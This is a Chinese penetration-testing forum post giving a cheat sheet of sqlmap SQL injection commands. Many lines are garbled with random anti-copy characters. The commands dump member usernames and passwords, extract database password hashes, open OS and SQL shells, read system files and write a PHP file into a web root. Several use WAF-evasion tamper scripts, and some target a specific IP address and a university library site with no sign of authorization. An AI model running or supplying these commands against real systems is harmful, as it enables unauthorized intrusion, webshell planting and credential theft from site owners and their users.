中国网络渗透测试联盟

标题: sqlmap使用实例 [打印本页]

作者: admin    时间: 2017-5-19 17:03
标题: sqlmap使用实例
/pentest/database/sqlmap
% m1 b) T5 E6 p, ^: }, R
; q: ?- H3 f: {4 c' a* Hupdate :::::>     in the folder   after  execute    following   order : svn update
# X# J& v" p" F' j/ K# l8 P* S7 ]  y1 c0 v9 i) Z" I; J
sqlmap.py -r 1.txt --current-db5 K: l1 I+ S( f+ Z

$ p9 U, @9 m% W6 U/ Iv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”! A! h' h( {, z; ]! Q9 U+ z
6 x4 R# \6 _3 t, ?# Z# R: `& J. i
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) / ~* y8 E! R. G/ u$ o0 U
猜解数据库3 s) M. ?: M4 U* v0 {1 X, n
./sqlmap.py -u "injection-url" --dbs
" L. @; r. W# r) n: nsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"3 B1 l: ~% R/ y  {  |+ b  E

" a8 B4 P5 X. J. p7 J猜解表名& E- Z0 P" c# S5 X
./sqlmap.py -u "injection-url" -D database_name --tables; j8 w6 d5 `+ H0 C" N, n& W
; q8 y% k9 l) |* ]$ l  p& a
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
, c7 S8 l2 y2 }( Isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! S$ Y2 B" k4 o% w1 _/ e9 ?  \$ k2 {2 g" y
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump- O# ]) T9 f1 r  T  W

  G+ M1 c6 m' ~7 K$ Isqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
( ?; y0 h- O" N6 T& Rsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
1 t  \2 I  Q1 ^sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
. ^4 ^- G* b: Jsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"$ f( g$ x& p6 Z4 B- d, W& r

, r* y: H/ u0 J; S# xsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py": ?0 r& @# j1 i" M
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"  t0 r0 I/ h9 r- b
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
" Z9 Q4 q" Y4 ?, J) `sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
* d$ f$ i: L5 K+ e% h5 A0 a1 x3 rsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump0 Y/ f2 R& `% |( N& e6 k6 h
5 ^8 x2 L! J9 n5 p3 E/ S2 |
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
& I2 x6 f" u9 q5 csqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
: N' E7 U4 J& b: \' b! k8 J: I" g0 q
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
7 ?8 D  q$ O8 l3 x猜解列名( R+ l$ K4 V' v+ D7 ?, n( S( \6 c
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
0 s$ F3 A" ?# h
" I7 I4 z4 V2 h; i) l5 i) Hsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" ( m9 ]% ]+ R/ c- O
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
* j  O+ D, N* _/ esqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py". v6 R, f, j* b+ w, x- C5 |  ?
9 W  a: \( f- z! ~6 Y" O) f* r
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
! e5 d5 U) Q3 c2 v  W8 D  y&submit=Go
4 g2 J( N# Y4 N7 O' o+ j7 v( H猜解值5 t6 T" N4 d2 @2 W" y
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump9 x0 H# M, h4 {- o
========================================================! }4 U3 Z2 g+ ^! |% \6 ?& O
搜索表名中包括mana字符的3 `- L4 ?' ^. O9 \  w, B3 _
/sqlmap.py -u "injection-url" -T mana --search7 V" [3 ^+ q6 S) ^1 f: y
返回一个交互式sql shell
* g2 U/ ~6 L$ @0 o# |/sqlmap.py -u "injection-url" --sql-shell5 X5 U2 k) I7 x8 t3 @  G0 `
读取指定文件(需权限)) N' x8 P$ K4 w$ L! B9 _
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini", s" N' V2 b3 D( |8 z+ ~
查看当前 用户 及 数据库 / y0 _; \7 Z4 G  \0 x
/sqlmap.py -u "injection-url" --current-user --current-db
" X4 e3 @: {8 c6 i* x9 \本地文件 写入 远程目标绝对路径
& I, J( g5 L4 s4 v# Z% Y3 m/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
) T& G  z2 p; c: S" y* {5 |- @7 ssqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" 8 u+ a: M! ^7 |$ H. Y( ^

2 R, [0 ~- M8 k, _$ L3 Wsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
4 G0 M+ x7 I, p% ^  V查看某用的权限
9 Z, g" i$ x2 c3 ]/sqlmap.py -u "injection-url" --privileges -U root4 V4 Z3 E, \! u8 [' m$ s; T' a. K
查看当前用户是否为dba. O& ]& p; @7 v, z+ @4 _  ~( D
/sqlmap.py -u "injection-url" --is-dba
1 C: t) _8 F1 U1 X  A, M读取所有数据库用户或指定数据库用户的密码
! Q, D6 a& N2 W$ z( \6 Fsqlmap.py -r 1.txt --users --passwords. Y4 I" ^* P+ O; b* c
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
7 A2 }/ Q$ W& t; y' _* m' q
0 y1 L' [* }5 b2 b/sqlmap.py -u "injection-url" --passwords -U root- V1 t% X  ]( a
: L  X) h9 Y$ Z! _6 D" O$ B1 [
--start&&--stop 与 --first&&--last 的区别
& a# k+ H7 Y2 q9 b8 K, `/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)( c: w! u0 }0 ]' Y

2 |- P5 I; ]1 O% A4 V从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)0 g, K5 l! v3 R- y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables% }0 \" W( L4 H( f/ {% s" Z2 r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
; T2 O( [) U- Q$ j8 u& e6 r; }( Q8 v
: v8 A1 ~  J8 f# V: M* ]* w执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)0 `$ y4 ?& j5 \& Q8 ]
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
* G2 n) d' P2 _& h! X- d  d
5 T* E( |$ E" }4 t




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2